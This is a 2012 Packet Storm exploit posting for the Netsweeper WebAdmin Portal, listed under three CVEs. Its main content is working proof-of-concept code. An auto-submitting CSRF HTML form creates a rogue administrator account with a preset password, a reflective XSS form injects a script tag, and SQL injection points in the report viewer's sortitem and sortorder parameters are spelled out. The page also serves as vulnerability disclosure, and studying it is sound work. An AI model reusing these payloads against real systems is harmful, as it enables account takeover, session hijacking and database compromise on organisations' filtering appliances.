exploit the possibilities

Netsweeper WebAdmin Portal CSRF / XSS / SQL Injection

Netsweeper WebAdmin Portal CSRF / XSS / SQL Injection
Posted Sep 17, 2012
Authored by Jacob Holcomb

Netsweeper WebAdmin Portal suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities. Note that most of this data released back in July of 2012 without the SQL injection information.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2012-2446, CVE-2012-2447, CVE-2012-3859
MD5 | aa024e95d3e0bd01ec3350b56bd27bdd

Netsweeper WebAdmin Portal CSRF / XSS / SQL Injection

Change Mirror Download
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and SQL Injection ("The later")\
# Date: Discovered and reported CSRF and XSS 4/2012 and "The later" 7/2012\
# Author: Jacob Holcomb/Gimppy042\
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)\
# CVE :
CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and
CVE-2012-3859 for the SQL Injection ("The later)
NOTE:

# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.

CSRF Exploitation:

In the following example we use CSRF to forge a HTTP POST request that will create an administrator account. The user must be logged in for CSRF to work. Exploitation of a non-administrative users (Sys op) account results in creation of a standard user account.

<head>
<title>CSRF Create Admin - Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
</head>

<body>

<form name="pwnd" action="http://server.domain_name/webadmin/accountmgr/adminupdate.php?act=add&filter_login=&goodmsg=Account+Added" method="post">
<input type="hidden" name="userid" value="netsweeperPWND" />
<input type="hidden" name="firstname" value="Jacob" />
<input type="hidden" name="lastname" value="Holcomb" />
<input type="hidden" name="email" value="pwnd@pwnd.com" />
<input type="hidden" name="organization" value="yep_PWND" />
<input type="hidden" name="description" value="PWND" />
<input type="hidden" name="pass1" value="Pwnd-321" />
<input type="hidden" name="pass2" value="Pwnd-321" />
<input type="hidden" name="classification" value="admin" />
<input type="hidden" name="expire" value="" />
<input type="hidden" name="accounttheme" value="" />
<input type="hidden" name="accountpmtheme" value="gpmtheme" />

<script>
document.pwnd.submit();
</script>

</body>


XSS Exploitation:

The following POC code exploits a reflective XSS vulnerability using the HTTP POST method.

<head>
<title>Post XSS(Reflective) Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
</head>

<body>

<form name="pwnd" action="http:// server.domain_name
/webadmin/tools/local_lookup.php?action=lookup" method="post">
<input type="hidden" name="user" value="pwnd" />
<input type="hidden" name="group" value="><script>alert('XSS')</script>" />
<input type="hidden" name="policy" value="pwnd" />
<input type="hidden" name="url" value="pwnd" />

<script>
document.getElementById('pwnd').submit();
</script>

</body>


SQL Injection ("The later") Exploitation:

The Netsweeper Internet Filter WebAdmin Portal is vulnerable to SQL injection, in the sortorder and sortitem variables.

http://SERVER_Hostname/webadmin/reporter/view_details.php?sortitem= SQLi
none &sortorder=asc&type=demand&id=1441
or

http://SERVER_Hostname/webadmin/reporter/view_details.php?sortitem=report_date&sortorder= SQLi
none &type=demand&id=1441.


Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    14 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close